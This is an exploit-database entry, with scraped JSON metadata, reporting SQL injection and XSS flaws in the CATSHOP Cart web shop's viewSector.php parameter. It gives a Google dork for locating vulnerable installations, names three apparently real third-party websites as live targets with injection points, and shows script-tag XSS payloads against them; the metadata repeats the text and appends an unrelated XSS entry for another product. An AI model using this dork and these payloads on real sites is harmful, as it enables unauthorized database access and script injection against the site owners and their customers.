ID 1337DAY-ID-17646
Type zdt
Reporter the_cyber_nuxbie
Modified 2012-03-10T00:00:00
Description
Exploit for php platform in category web applications
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Official Website: http://www.1337day.com 0
1 [+] Support E-mail : mr.inj3ct0r[at]gmail.com 1
0 0
1 ########################################## 1
0 I'm NuxbieCyber Member From Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[ CATSHOP Cart - SQL Injection Vulnerability ]
[x] Author : the_cyber_nuxbie
[x] Home : www.thecybernuxbie.com
[x] E-mail : [email protected]
[x] Found : 10 March 2012 @ 07:54 AM.
[x] Tested : Back|Track 5.
[x] Dork : inurl:"/viewSector.php?id="
________________________________________________________________________
************************************************************************
- Info WebApps:
CATSHOP è un prodotto MNS completamente autogestito e dato in utilizzo al cliente presso i nostri server Web.
CATSHOP is fully self-managed and MNS products used since our customers in the web server.
This Content Develop By: http://www.mns.it/site/mns/
- Exploit Report:
http://localhost/viewSector.php?id=[SQL Injection]
- Sample WebApps Vuln SQLi:
http://reinvestgroup.it/cat_shop040708/viewSector.php?id=9' + [SQL Injection]
http://globostraslochi.com/catshop230608/viewSector.php?id=63' + [SQL Injection]
http://sidermetal.biz/catshop230608/viewSector.php?id=31' + [SQL Injection]
- Info WebApps:
CATSHOP è un prodotto MNS completamente autogestito e dato in utilizzo al cliente presso i nostri server Web.
CATSHOP is fully self-managed and MNS products used since our customers in the web server.
This Content Develop By: http://www.mns.it/site/mns/
- Google Dork:
inurl:"/viewSector.php?id="
- Exploit Concept:
http://lokalisasi/viewSector.php?id=[XSS]
- Sample Web Persistent XSS Vulnerability:
http://www.sidermetal.biz/catshop230608/viewSector.php?id=<script>alert(31337);</script> <:- [XSS]
http://globostraslochi.com/catshop230608/viewSector.php?id=<script>alert(31337);</script> <:- [XSS]
http://reinvestgroup.it/cat_shop040708/viewSector.php?id=<script>alert(31337);</script> <:- [XSS]
0day no more...
"n0 d0rk f0r k1dd10ts"
- Curahan Hati:
I want to school college level...
(the biggest obsession = S1 - TI)
But I do not have a cost...
Help Me...!!!
- Greetz:
*** 1337day Inject0r TEAM ***
...:::' All Member & Staff Inject0r TEAM ':::...
- Greetz To All Exploiters From Indonesian:
[ Member Of Inj3ct0r & Exploit-DB ]
Akatsuchi, AntiSecurity, Arianom, bius, blackraptor, bumble_be, c4uR, cr4wl3r, cyberlog, Don Tukulesto, EA Ngel,
eidelweiss, Flyff666, g3mbeLz_YCL, Gendenk, gunslinger_, h4ntu, IbnuSina, irvian, Jack, k3m4n9i, k1ngk0n9, k1tk4t,
k4mtiez, K-159, kecemplungkalen, Mask_magicianz, MISTERFRIBO, M3NW5, Mbah_Semar, mywisdom, Newbie Campuz, NoGe,
NTOS-Team, Oli Bekas, OoN_Boy, Pokeng, r3m1ck, S3T4N, s4va, sikunYuk, SENOT, skulmatic, spykit, Sudden_death,
team_elite, tempe_mendoan, the_day, tomplixsee, v3n0m, vir0e5, Vrs-hCk, vYc0d, Xr0b0t, y3d1ps, etc...
"Kalian Telah Mengharumkan Nama INDONESIA Di Dunia IT-Underground"
Me @ March, 10 2012, GMT +07:54 Solo Raya, Indonesian.
# 0day.today [2018-02-09] #
{"published": "2012-03-10T00:00:00", "id": "1337DAY-ID-17646", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:37:40", "bulletin": {"published": "2012-03-10T00:00:00", "id": "1337DAY-ID-17646", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 3.5, "modified": "2016-04-20T01:37:40"}}, "hash": "0286ac31cd2a96333433282c668adfc49bcbae8819acabccd5e48a92c970365a", "description": "Exploit for php platform in category web applications", "type": "zdt", "lastseen": "2016-04-20T01:37:40", "edition": 1, "title": "CATSHOP Cart - XSS / SQL Injection Vulnerability", "href": "http://0day.today/exploit/description/17646", "modified": "2012-03-10T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "http://0day.today/exploit/17646", "references": [], "reporter": "the_cyber_nuxbie", "sourceData": "1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n0 _ __ __ __ 1\r\n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n1 \\ \\____/ >> Exploit database separated by exploit 0\r\n0 \\/___/ type (local, remote, DoS, etc.) 1\r\n1 1\r\n0 [+] Official Website: http://www.1337day.com 0\r\n1 [+] Support E-mail : mr.inj3ct0r[at]gmail.com 1\r\n0 0\r\n1 ########################################## 1\r\n0 I'm NuxbieCyber Member From Inj3ct0r Team 1\r\n1 ########################################## 0\r\n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\r\n\r\n[ CATSHOP Cart - SQL Injection Vulnerability ]\r\n\r\n[x] Author : the_cyber_nuxbie\r\n[x] Home : www.thecybernuxbie.com\r\n[x] E-mail : staff@thecybernuxbie.com\r\n[x] Found : 10 March 2012 @ 07:54 AM.\r\n[x] Tested : Back|Track 5.\r\n[x] Dork : inurl:\"/viewSector.php?id=\"\r\n________________________________________________________________________\r\n************************************************************************\r\n\r\n- Info WebApps:\r\nCATSHOP \u00e8 un prodotto MNS completamente autogestito e dato in utilizzo al cliente presso i nostri server Web.\r\nCATSHOP is fully self-managed and MNS products used since our customers in the web server.\r\nThis Content Develop By: http://www.mns.it/site/mns/\r\n\r\n- Exploit Report:\r\nhttp://localhost/viewSector.php?id=[SQL Injection]\r\n\r\n- Sample WebApps Vuln SQLi:\r\nhttp://reinvestgroup.it/cat_shop040708/viewSector.php?id=9' + [SQL Injection]\r\nhttp://globostraslochi.com/catshop230608/viewSector.php?id=63' + [SQL Injection]\r\nhttp://sidermetal.biz/catshop230608/viewSector.php?id=31' + [SQL Injection]\r\n\r\n - Info WebApps:\r\n CATSHOP \u00e8 un prodotto MNS completamente autogestito e dato in utilizzo al cliente presso i nostri server Web.\r\n CATSHOP is fully self-managed and MNS products used since our customers in the web server.\r\n This Content Develop By: http://www.mns.it/site/mns/\r\n \r\n - Google Dork:\r\n inurl:\"/viewSector.php?id=\"\r\n\r\n - Exploit Concept:\r\n http://lokalisasi/viewSector.php?id=[XSS]\r\n\r\n - Sample Web Persistent XSS Vulnerability:\r\n http://www.sidermetal.biz/catshop230608/viewSector.php?id=<script>alert(31337);</script> <:- [XSS]\r\n http://globostraslochi.com/catshop230608/viewSector.php?id=<script>alert(31337);</script> <:- [XSS]\r\n http://reinvestgroup.it/cat_shop040708/viewSector.php?id=<script>alert(31337);</script> <:- [XSS]\r\n\r\n \r\n0day no more...\r\n\"n0 d0rk f0r k1dd10ts\"\r\n\r\n- Curahan Hati:\r\nI want to school college level...\r\n(the biggest obsession = S1 - TI)\r\nBut I do not have a cost...\r\nHelp Me...!!!\r\n\r\n- Greetz:\r\n*** 1337day Inject0r TEAM ***\r\n...:::' All Member & Staff Inject0r TEAM ':::...\r\n\r\n- Greetz To All Exploiters From Indonesian:\r\n[ Member Of Inj3ct0r & Exploit-DB ]\r\nAkatsuchi, AntiSecurity, Arianom, bius, blackraptor, bumble_be, c4uR, cr4wl3r, cyberlog, Don Tukulesto, EA Ngel,\r\neidelweiss, Flyff666, g3mbeLz_YCL, Gendenk, gunslinger_, h4ntu, IbnuSina, irvian, Jack, k3m4n9i, k1ngk0n9, k1tk4t,\r\nk4mtiez, K-159, kecemplungkalen, Mask_magicianz, MISTERFRIBO, M3NW5, Mbah_Semar, mywisdom, Newbie Campuz, NoGe, \r\nNTOS-Team, Oli Bekas, OoN_Boy, Pokeng, r3m1ck, S3T4N, s4va, sikunYuk, SENOT, skulmatic, spykit, Sudden_death,\r\nteam_elite, tempe_mendoan, the_day, tomplixsee, v3n0m, vir0e5, Vrs-hCk, vYc0d, Xr0b0t, y3d1ps, etc... \r\n\r\n\"Kalian Telah Mengharumkan Nama INDONESIA Di Dunia IT-Underground\"\r\n\r\nMe @ March, 10 2012, GMT +07:54 Solo Raya, Indonesian.\r\n\r\n\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "e45fbfa2178e79d2efcd62a0a000a733", "key": "title"}, {"hash": "5044e7948410b7322b45fde4367d55fd", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "793b187eefd55cf519a6a4035db7979f", "key": "reporter"}, {"hash": "d874f2f7c728aa599a742a5ecbaea296", "key": "sourceData"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "fc2ed1139e93896d4a6f8611b8e4f23a", "key": "href"}, {"hash": "b018120c95998b0c335ce167859e740b", "key": "sourceHref"}, {"hash": "5044e7948410b7322b45fde4367d55fd", "key": "modified"}], "objectVersion": "1.0"}}], "description": "Exploit for php platform in category web applications", "hash": "971b371b0c317d1040e8f888b8c5a11b1a4179838d01d768241cabc0431a75dd", "enchantments": {"score": {"value": 0.7, "vector": "NONE", "modified": "2018-02-09T09:21:00"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:17646"]}], "modified": "2018-02-09T09:21:00"}, "vulnersScore": 0.7}, "type": "zdt", "lastseen": "2018-02-09T09:21:00", "edition": 2, "title": "CATSHOP Cart - XSS / SQL Injection Vulnerability", "href": "https://0day.today/exploit/description/17646", "modified": "2012-03-10T00:00:00", "bulletinFamily": "exploit", "viewCount": 3, "cvelist": [], "sourceHref": "https://0day.today/exploit/17646", "references": [], "reporter": "the_cyber_nuxbie", "sourceData": "1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n0 _ __ __ __ 1\r\n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n1 \\ \\____/ >> Exploit database separated by exploit 0\r\n0 \\/___/ type (local, remote, DoS, etc.) 1\r\n1 1\r\n0 [+] Official Website: http://www.1337day.com 0\r\n1 [+] Support E-mail : mr.inj3ct0r[at]gmail.com 1\r\n0 0\r\n1 ########################################## 1\r\n0 I'm NuxbieCyber Member From Inj3ct0r Team 1\r\n1 ########################################## 0\r\n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\r\n\r\n[ CATSHOP Cart - SQL Injection Vulnerability ]\r\n\r\n[x] Author : the_cyber_nuxbie\r\n[x] Home : www.thecybernuxbie.com\r\n[x] E-mail : [email\u00a0protected]\r\n[x] Found : 10 March 2012 @ 07:54 AM.\r\n[x] Tested : Back|Track 5.\r\n[x] Dork : inurl:\"/viewSector.php?id=\"\r\n________________________________________________________________________\r\n************************************************************************\r\n\r\n- Info WebApps:\r\nCATSHOP \u00e8 un prodotto MNS completamente autogestito e dato in utilizzo al cliente presso i nostri server Web.\r\nCATSHOP is fully self-managed and MNS products used since our customers in the web server.\r\nThis Content Develop By: http://www.mns.it/site/mns/\r\n\r\n- Exploit Report:\r\nhttp://localhost/viewSector.php?id=[SQL Injection]\r\n\r\n- Sample WebApps Vuln SQLi:\r\nhttp://reinvestgroup.it/cat_shop040708/viewSector.php?id=9' + [SQL Injection]\r\nhttp://globostraslochi.com/catshop230608/viewSector.php?id=63' + [SQL Injection]\r\nhttp://sidermetal.biz/catshop230608/viewSector.php?id=31' + [SQL Injection]\r\n\r\n - Info WebApps:\r\n CATSHOP \u00e8 un prodotto MNS completamente autogestito e dato in utilizzo al cliente presso i nostri server Web.\r\n CATSHOP is fully self-managed and MNS products used since our customers in the web server.\r\n This Content Develop By: http://www.mns.it/site/mns/\r\n \r\n - Google Dork:\r\n inurl:\"/viewSector.php?id=\"\r\n\r\n - Exploit Concept:\r\n http://lokalisasi/viewSector.php?id=[XSS]\r\n\r\n - Sample Web Persistent XSS Vulnerability:\r\n http://www.sidermetal.biz/catshop230608/viewSector.php?id=<script>alert(31337);</script> <:- [XSS]\r\n http://globostraslochi.com/catshop230608/viewSector.php?id=<script>alert(31337);</script> <:- [XSS]\r\n http://reinvestgroup.it/cat_shop040708/viewSector.php?id=<script>alert(31337);</script> <:- [XSS]\r\n\r\n \r\n0day no more...\r\n\"n0 d0rk f0r k1dd10ts\"\r\n\r\n- Curahan Hati:\r\nI want to school college level...\r\n(the biggest obsession = S1 - TI)\r\nBut I do not have a cost...\r\nHelp Me...!!!\r\n\r\n- Greetz:\r\n*** 1337day Inject0r TEAM ***\r\n...:::' All Member & Staff Inject0r TEAM ':::...\r\n\r\n- Greetz To All Exploiters From Indonesian:\r\n[ Member Of Inj3ct0r & Exploit-DB ]\r\nAkatsuchi, AntiSecurity, Arianom, bius, blackraptor, bumble_be, c4uR, cr4wl3r, cyberlog, Don Tukulesto, EA Ngel,\r\neidelweiss, Flyff666, g3mbeLz_YCL, Gendenk, gunslinger_, h4ntu, IbnuSina, irvian, Jack, k3m4n9i, k1ngk0n9, k1tk4t,\r\nk4mtiez, K-159, kecemplungkalen, Mask_magicianz, MISTERFRIBO, M3NW5, Mbah_Semar, mywisdom, Newbie Campuz, NoGe, \r\nNTOS-Team, Oli Bekas, OoN_Boy, Pokeng, r3m1ck, S3T4N, s4va, sikunYuk, SENOT, skulmatic, spykit, Sudden_death,\r\nteam_elite, tempe_mendoan, the_day, tomplixsee, v3n0m, vir0e5, Vrs-hCk, vYc0d, Xr0b0t, y3d1ps, etc... \r\n\r\n\"Kalian Telah Mengharumkan Nama INDONESIA Di Dunia IT-Underground\"\r\n\r\nMe @ March, 10 2012, GMT +07:54 Solo Raya, Indonesian.\r\n\r\n\n\n# 0day.today [2018-02-09] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "86fadafb20def5ce362e67fcbe518836", "key": "href"}, {"hash": "5044e7948410b7322b45fde4367d55fd", "key": "modified"}, {"hash": "5044e7948410b7322b45fde4367d55fd", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "793b187eefd55cf519a6a4035db7979f", "key": "reporter"}, {"hash": "35c70fca362716058add98840f6e6416", "key": "sourceData"}, {"hash": "8d1c56d06651f8470474d294cb23f0e8", "key": "sourceHref"}, {"hash": "e45fbfa2178e79d2efcd62a0a000a733", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"securityvulns": [{"lastseen": "2018-08-31T11:09:26", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2007-07-31T00:00:00", "published": "2007-07-31T00:00:00", "id": "SECURITYVULNS:VULN:7993", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7993", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:22", "bulletinFamily": "software", "description": "[Aria-Security]\r\n\r\n# Tilte: community Cross-site Scripting (XSS)\r\n# <www.Aria-security.Com For English >\r\n# <www.Aria-Security.net For Persian >\r\n# < Author: You_You >\r\n# < Software: Commute (The best community) >\r\n# < Site Script: http://sourceforge.net/projects/commutese/>\r\n\r\nproof Of Concept :\r\n\r\n\r\nlocal/[path]/require/small_head.php?retun=[Xss-script]", "modified": "2007-07-31T00:00:00", "published": "2007-07-31T00:00:00", "id": "SECURITYVULNS:DOC:17646", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:17646", "title": "[Aria-security] community Cross-site Scripting (XSS)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}